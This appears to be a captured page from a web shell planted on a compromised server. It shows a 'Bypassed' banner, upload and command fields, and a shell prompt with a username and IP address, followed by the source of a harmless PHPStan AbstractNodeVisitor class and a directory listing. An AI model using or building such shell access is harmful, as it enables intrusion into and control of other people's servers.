[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.216.150: ~ $
<?php declare(strict_types = 1);

namespace PHPStan\PhpDocParser\Ast;

/**
 * Inspired by https://github.com/nikic/PHP-Parser/tree/36a6dcd04e7b0285e8f0868f44bd4927802f7df1
 *
 * Copyright (c) 2011, Nikita Popov
 * All rights reserved.
 */
abstract class AbstractNodeVisitor implements NodeVisitor // phpcs:ignore SlevomatCodingStandard.Classes.SuperfluousAbstractClassNaming.SuperfluousPrefix
{

	public function beforeTraverse(array $nodes): ?array
	{
		return null;
	}

	public function enterNode(Node $node)
	{
		return null;
	}

	public function leaveNode(Node $node)
	{
		return null;
	}

	public function afterTraverse(array $nodes): ?array
	{
		return null;
	}

}

Filemanager

Name Type Size Permission Actions
ConstExpr Folder 0755
NodeVisitor Folder 0755
PhpDoc Folder 0755
Type Folder 0755
AbstractNodeVisitor.php File 671 B 0644
Attribute.php File 341 B 0644
Comment.php File 664 B 0644
Node.php File 348 B 0644
NodeAttributes.php File 682 B 0644
NodeTraverser.php File 8.21 KB 0644
NodeVisitor.php File 2.45 KB 0644